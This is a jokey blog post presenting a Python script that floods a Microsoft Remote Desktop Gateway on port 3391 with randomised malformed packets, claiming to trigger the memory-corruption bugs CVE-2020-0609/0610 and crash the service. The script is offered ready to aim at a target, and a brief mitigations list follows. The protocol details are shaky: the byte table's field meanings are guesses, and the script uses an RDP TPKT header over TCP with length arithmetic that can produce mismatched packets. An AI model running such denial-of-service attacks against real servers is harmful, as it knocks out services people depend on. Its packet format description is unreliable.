Skip to content

🚀 Exploiting RD Gateway Vulnerabilities with Malformed CONNECT_PKT_FRAGMENT Messages

Introduction

Ah, Microsoft’s Remote Desktop Gateway (RDG)—the thing that lets you securely RDP over HTTPS while simultaneously serving as an all-you-can-exploit buffet for attackers. Today, we're diving into CVE-2020-0609 and CVE-2020-0610, two little gems that let us cause memory corruption and DoS with malformed packets. Because why not?

Here’s what’s on the menu: 1. A breakdown of CONNECT_PKT_FRAGMENT packets. (Like an autopsy, but nerdier.) 2. How a malformed packet ruins RDG’s day. 3. A Python fuzzing script to test for vulnerabilities. Because breaking things is fun.

Understanding the CONNECT_PKT_FRAGMENT Structure

RD Gateway operates using fragments of connection packets (like your attention span on a Monday morning). A CONNECT_PKT_FRAGMENT usually looks like this:

[ Attacker ] --> [ RD Gateway Server ]
                   |----------------------|
                   | CONNECT_PKT_FRAGMENT |
                   |  - Header            |
                   |  - Length            |
                   |  - Session Data      |
                   |----------------------|
Bytes Meaning
\x03\x00 TPKT Header (Length Indicator)
\x00\x13 Total Packet Length (19 bytes)
\x0e\xd0 Session Length/Fragment Size
\x00\x00 Flags or Reserved Bytes
\x12\x34 Transaction ID or Connection Identifier
\x00\x02 Fragment Count or Connection Status
\x00\x1f Reserved or Message Type Indicator
\x00\x00 Padding or Checksum Placeholder

A malformed CONNECT_PKT_FRAGMENT can cause RDG to throw a tantrum, crash, and sometimes even give you remote code execution. Not ideal for sysadmins, but a delightful surprise for pentesters.

[ Malformed Packet ] --> [ RD Gateway Server ] --> [ CRASH 💥 ]

Python Fuzzing Script for RD Gateway

Want to stress-test RD Gateway? Here’s a Python script that generates and sends malformed packets because, well, curiosity killed the cat—but satisfaction brought it back.

import socket
import random
import struct
import time

# Target RD Gateway server details
TARGET_HOST = "target-rd-gateway.com"  # Change this to your target
TARGET_PORT = 3391  # Default RDG port

# Function to generate malformed CONNECT_PKT_FRAGMENT packets
def generate_malformed_packet():
    """
    Generates a malformed CONNECT_PKT_FRAGMENT message.
    Randomizes values to trigger unexpected behavior.
    """
    packet = b"\x03\x00"  # TPKT Header
    length = random.randint(10, 40)  # Random length to cause buffer overflows
    packet += struct.pack(">H", length)  # Incorrect length field

    # Randomized fragment payload with potentially dangerous values
    packet += struct.pack(">H", random.randint(0x0001, 0xFFFF))  # Random fragment ID
    packet += struct.pack(">H", random.randint(0x0001, 0xFFFF))  # Random size value
    packet += struct.pack(">H", random.randint(0x0000, 0x00FF))  # Reserved bytes
    packet += struct.pack(">H", random.randint(0x0000, 0xFFFF))  # Fake Connection ID
    packet += struct.pack(">H", random.randint(0x0000, 0xFFFF))  # Invalid Fragment Count
    packet += b"\x00" * (length - len(packet))  # Padding with nulls to match length

    return packet

# Function to send malformed packets
def send_malformed_packet():
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        try:
            print(f"[+] Connecting to {TARGET_HOST}:{TARGET_PORT}...")
            sock.connect((TARGET_HOST, TARGET_PORT))

            for i in range(10):  # Send multiple packets to test behavior
                payload = generate_malformed_packet()
                print(f"[+] Sending malformed packet {i+1}...")
                sock.send(payload)

                try:
                    response = sock.recv(1024)
                    print(f"[-] Response: {response.hex()}")
                except socket.timeout:
                    print("[!] No response (possible crash)")

                time.sleep(1)  # Delay between attempts

        except Exception as e:
            print(f"[!] Error: {e}")

# Run the attack simulation
send_malformed_packet()
Overview of attack flow: 
[ Attacker ] --> [ Sends Malformed Packet ] --> [ RD Gateway Overflows & Crashes ]

Expected Outcomes

  • If the service crashes → Congrats, you found a vulnerability! 🎉
  • If you get an error message → RDG might be patched, or you need to be sneakier.
  • If nothing happens → Well, that’s anticlimactic.

Mitigations & Recommendations

[ Patch RD Gateway ] --> [ Enable NLA ] --> [ Restrict Access ]
- Patch RD Gateway (Yes, we know updates are annoying, but so is getting pwned). - Enable Network-Level Authentication (NLA) to reduce exposure. - Use an IDS/IPS to detect and block malformed RDP packets before they ruin your day. - Restrict RD Gateway access—seriously, don’t let the entire internet RDP into your network.

Conclusion

And there you have it! By sending malformed CONNECT_PKT_FRAGMENT messages, we can make RD Gateway go boom. Use responsibly, disclose responsibly, and maybe buy your blue team a coffee after testing (because you will give them a headache).

🔹 Want to explore RCE exploitation? Stay tuned for the next post! 🚀

💬 Have questions or feedback? Drop a comment below, or send a strongly worded email to your nearest sysadmin! 😉